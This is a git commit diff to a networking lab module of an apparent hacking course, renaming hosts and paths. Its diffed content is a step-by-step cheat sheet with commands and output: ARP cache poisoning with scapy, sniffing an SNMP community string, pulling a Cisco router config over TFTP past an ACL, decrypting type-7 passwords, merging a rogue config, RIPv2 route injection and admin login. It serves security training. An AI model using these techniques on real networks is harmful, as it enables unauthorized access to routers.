New topology drawing

becomingahacker · Jun 27, 2024 · 7a4fa3d · 7a4fa3d
1 parent d6a622a
commit 7a4fa3d
Show file tree

Hide file tree

Showing 2 changed files with 30 additions and 30 deletions.
diff --git a/modules/4.md b/modules/4.md
@@ -5,7 +5,7 @@ layout: module
 
 # Networking
 
-In this module, break into the IOS router at the center of the network
+In this module, break into the IOS iosv-r1 at the center of the network
 using TELNET and a locally configured username and password.
 
 ## Exercise 1 : Grab the Complete Router Configuration and Decrypt Passwords
@@ -17,7 +17,7 @@ height="75%"}
 
 A partial router configuration is provided:
 
-    hostname router
+    hostname iosv-r1
     !
     interface Loopback0
      ip address 10.1.3.1 255.255.255.255
@@ -41,9 +41,9 @@ Using `tshark` or [Wireshark](http://wiresharkdownloads.riverbed.com/video/wires
 
 {% capture text %}
 <pre>
-root@bah-pod1-kali:~# <strong> host windows.pod.becomingahacker.com</strong>
+root@kali:~# <strong> host windows.pod.becomingahacker.com</strong>
 windows.pod.becomingahacker.com has address 10.1.1.4
-root@bah-pod1-kali:~# <strong> scapy</strong>
+root@kali:~# <strong> scapy</strong>
 Welcome to Scapy (2.2.0)
 >>> arpcachepoison('10.1.1.1','10.1.1.4')
 .
@@ -52,10 +52,10 @@ Sent 1 packets.
 [1]+  Stopped                 sudo scapy
 
 
-root@bah-pod1-kali:~# <strong> bg</strong>
+root@kali:~# <strong> bg</strong>
 [1]+ sudo scapy &
 
-root@bah-pod1-kali:~# <strong> tshark -i eth1 -V udp port 162</strong>
+root@kali:~# <strong> tshark -i eth1 -V udp port 162</strong>
 Capturing on 'eth1'
 Frame 1: 443 bytes on wire (3544 bits), 443 bytes captured (3544 bits) on interface 0
 ...
@@ -75,7 +75,7 @@ Simple Network Management Protocol
 
 ### Task 2
 
-Using the discovered SNMPv2 community string and the [Cisco-Config-Copy-MIB](http://tools.cisco.com/Support/SNMP/do/BrowseMIB.do?local=en&mibName=CISCO-CONFIG-COPY-MIB), make the router upload its configuration via TFTP to **kali.pod.becomingahacker.com**. The uploaded configuration should be placed in `/srv/tftp`. A tool using [Scapy](http://www.secdev.org/projects/scapy/doc/) is provided to help you with this. ( `~/labs/networking/get-cisco-cfg.py` ) An access control list (ACL) configured on the router is blocking you--**bypass it!** Verify the TFTP server is running:
+Using the discovered SNMPv2 community string and the [Cisco-Config-Copy-MIB](http://tools.cisco.com/Support/SNMP/do/BrowseMIB.do?local=en&mibName=CISCO-CONFIG-COPY-MIB), make the router upload its configuration via TFTP to **kali.pod.becomingahacker.com**. The uploaded configuration should be placed in `/srv/tftp`. A tool using [Scapy](http://www.secdev.org/projects/scapy/doc/) is provided to help you with this. ( `~/becoming-a-hacker/labs/networking/get-cisco-cfg.py` ) An access control list (ACL) configured on the router is blocking you--**bypass it!** Verify the TFTP server is running:
 
 {% capture code %}
 netstat -lun | grep 69
@@ -88,7 +88,7 @@ netstat -lun | grep 69
 <pre>
 Help for get-cisco-cfg.py.
 
-            root@bah-pod1-kali:~/labs/networking# ./get-cisco-cfg.py -h
+            root@kali:~/becoming-a-hacker/labs/networking# ./get-cisco-cfg.py -h
             WARNING: No route found for IPv6 destination :: (no default route?)
             Usage: get-cisco-cfg.py [options]
 
@@ -115,7 +115,7 @@ Help for get-cisco-cfg.py.
 <pre>
 Running get-cisco-cfg.py
 
-         root@bah-pod1-kali:~/labs/networking# ./get-cisco-cfg.py -i eth1 -s 10.1.1.4 -d 10.1.1.1 -t 10.1.2.2 -f my-config -c 
+         root@kali:~/becoming-a-hacker/labs/networking# ./get-cisco-cfg.py -i eth1 -s 10.1.1.4 -d 10.1.1.1 -t 10.1.2.2 -f my-config -c 
          WARNING: No route found for IPv6 destination :: (no default route?)
          Attempting to download IOS config from 10.1.1.1
          .
@@ -137,14 +137,14 @@ Running get-cisco-cfg.py
 
 Viewing TFTP configuration
 
-         root@bah-pod1-kali:~/labs/networking# more tftp/my-config
+         root@kali:~/becoming-a-hacker/labs/networking# more tftp/my-config
          !
          version 15.5
          service timestamps debug datetime msec
          service timestamps log datetime msec
          service password-encryption
          !
-         hostname router
+         hostname iosv-r1
          !
          boot-start-marker
          boot-end-marker
@@ -166,13 +166,13 @@ have to build the tool using the
 provided [Makefile](http://en.wikipedia.org/wiki/Makefile#Execution).
 Here's an example of use:
 
-      root@bah-pod1-kali:~/labs/networking/ciscodecrypt# ./ciscodecrypt -p 0518030C22434048
+      root@kali:~/becoming-a-hacker/labs/networking/ciscodecrypt# ./ciscodecrypt -p 0518030C22434048
       password: seccon!
 
 {% capture text %}
 <pre>
 Building ciscodecrypt
-    root@bah-pod1-kali:~/labs/networking/ciscodecrypt# make
+    root@kali:~/becoming-a-hacker/labs/networking/ciscodecrypt# make
     cc  -o ciscodecrypt  ciscodecrypt.c
     ciscodecrypt.c: In function ‘cdecrypt’:
     ciscodecrypt.c:28:12: warning: incompatible implicit declaration of built-in function ‘strlen’ [enabled by default]
@@ -183,10 +183,10 @@ Building ciscodecrypt
 
 Running ciscodecrypt
 
-    root@bah-pod1-kali:~/labs/networking# more tftp/my-config
-    root@bah-pod1-kali:~/labs/networking/ciscodecrypt# ./ciscodecrypt -p 0955411C54174711004D
+    root@kali:~/becoming-a-hacker/labs/networking# more tftp/my-config
+    root@kali:~/becoming-a-hacker/labs/networking/ciscodecrypt# ./ciscodecrypt -p 0955411C54174711004D
     password: <removed>
-    root@bah-pod1-kali:~/labs/networking/ciscodecrypt# ./ciscodecrypt -p 0818696F213B24352B
+    root@kali:~/becoming-a-hacker/labs/networking/ciscodecrypt# ./ciscodecrypt -p 0818696F213B24352B
     password: <removed>
     ...
 
@@ -208,9 +208,9 @@ figure out how to bypass this. See the **Bonus** section below.
 <pre>
 Edit /srv/tftp/to-apply.cfg
 
-    root@bah-pod1-kali:~/labs/networking# nano /srv/tftp/to-apply.cfg
+    root@kali:~/becoming-a-hacker/labs/networking# nano /srv/tftp/to-apply.cfg
 
-    root@bah-pod1-kali:~/labs/networking# cat /srv/tftp/to-apply.cfg
+    root@kali:~/becoming-a-hacker/labs/networking# cat /srv/tftp/to-apply.cfg
     !
     no access-list 2
     access-list 2 permit 10.1.1.4
@@ -225,7 +225,7 @@ Edit /srv/tftp/to-apply.cfg
 
 Merge configuration
 
-    root@bah-pod1-kali:~/labs/networking# sudo ./merge-cisco-cfg.py -i eth1 -s 10.1.1.4 -d 10.1.1.1 -t 10.1.2.2 -f to-apply.cfg -c <removed>
+    root@kali:~/becoming-a-hacker/labs/networking# sudo ./merge-cisco-cfg.py -i eth1 -s 10.1.1.4 -d 10.1.1.1 -t 10.1.2.2 -f to-apply.cfg -c <removed>
     WARNING: No route found for IPv6 destination :: (no default route?)
     Attempting to upload IOS config to 10.1.1.1
     .
@@ -247,7 +247,7 @@ Merge configuration
 
 Log in
 
-    root@bah-pod1-kali:~/labs/networking# telnet router
+    root@kali:~/becoming-a-hacker/labs/networking# telnet iosv-r1
 
                                     NOTICE
 
@@ -257,7 +257,7 @@ Log in
     Username: admin
     Password:
     ...
-    router#
+    iosv-r1#
 </pre>
 {% endcapture %}
 {% include cheat.html text=text %}
@@ -273,7 +273,7 @@ the configured ACL or using ARP cache poisoning.
 <pre>
 Discover the RIPv2 Password
 
-    root@bah-pod1-kali:~/labs/networking# tshark -i eth2 -V udp port 520
+    root@kali:~/becoming-a-hacker/labs/networking# tshark -i eth2 -V udp port 520
     Capturing on 'eth2'
     Frame 1: 106 bytes on wire (848 bits), 106 bytes captured (848 bits) on interface 0
         Interface id: 0
@@ -289,16 +289,16 @@ Discover the RIPv2 Password
 
 Configure IP Address for Overridden Route
 
-    root@bah-pod1-kali:~/labs/networking# ip route
+    root@kali:~/becoming-a-hacker/labs/networking# ip route
     default via 10.1.1.1 dev eth1
     169.254.169.254 via 10.1.0.100 dev eth0
     10.1.0.0/24 dev eth0  proto kernel  scope link  src 10.1.0.104
     10.1.1.0/24 dev eth1  proto kernel  scope link  src 10.1.1.2
     10.1.2.0/24 dev eth2  proto kernel  scope link  src 10.1.2.2
     10.1.4.248/29 via 10.1.0.254 dev eth0
-    seccon@pod-XX-kali:~/labs/networking$ sudo ip address add 10.1.1.5/32 dev eth2
-    seccon@pod-XX-kali:~/labs/networking$ sudo ip route add 10.1.3.1/32 via 10.1.2.1 src 10.1.1.5
-    seccon@pod-XX-kali:~/labs/networking$ ip route
+    seccon@pod-XX-kali:~/becoming-a-hacker/labs/networking$ sudo ip address add 10.1.1.5/32 dev eth2
+    seccon@pod-XX-kali:~/becoming-a-hacker/labs/networking$ sudo ip route add 10.1.3.1/32 via 10.1.2.1 src 10.1.1.5
+    seccon@pod-XX-kali:~/becoming-a-hacker/labs/networking$ ip route
     default via 10.1.1.1 dev eth1
     169.254.169.254 via 10.1.0.100 dev eth0
     10.1.0.0/24 dev eth0  proto kernel  scope link  src 10.1.0.104
@@ -311,7 +311,7 @@ Configure IP Address for Overridden Route
 
 Inject RIPv2 Route
 
-    root@bah-pod1-kali:~/labs/networking# ./inject.py -h
+    root@kali:~/becoming-a-hacker/labs/networking# ./inject.py -h
     WARNING: No route found for IPv6 destination :: (no default route?)
     Usage: inject.py [options]
 
@@ -324,7 +324,7 @@ Inject RIPv2 Route
       -r ROUTE, --route=ROUTE
                             RIPv2 Prefix
       -m MASK, --mask=MASK  RIPv2 Subnet Mask
-    seccon@pod-XX-kali:~/labs/networking$ sudo ./inject.py -i eth2 -p  -r 10.1.1.5 -m 255.255.255.255
+    seccon@pod-XX-kali:~/becoming-a-hacker/labs/networking$ sudo ./inject.py -i eth2 -p  -r 10.1.1.5 -m 255.255.255.255
     WARNING: No route found for IPv6 destination :: (no default route?)
     Attempting to inject RIPv2 route.  It will last about 240 seconds
     .
@@ -334,14 +334,14 @@ Inject RIPv2 Route
 
 Log in
 
-    root@bah-pod1-kali:~/labs/networking# telnet 10.1.1.1
+    root@kali:~/becoming-a-hacker/labs/networking# telnet 10.1.1.1
     ...
     User Access Verification
 
     Username: admin
     Password:
     ...
-    router#
+    iosv-r1#
 </pre>
 {% endcapture %}
 {% include cheat.html text=text %}
diff --git a/os_files/seccon-becoming-a-hacker-net-topo.png b/os_files/seccon-becoming-a-hacker-net-topo.png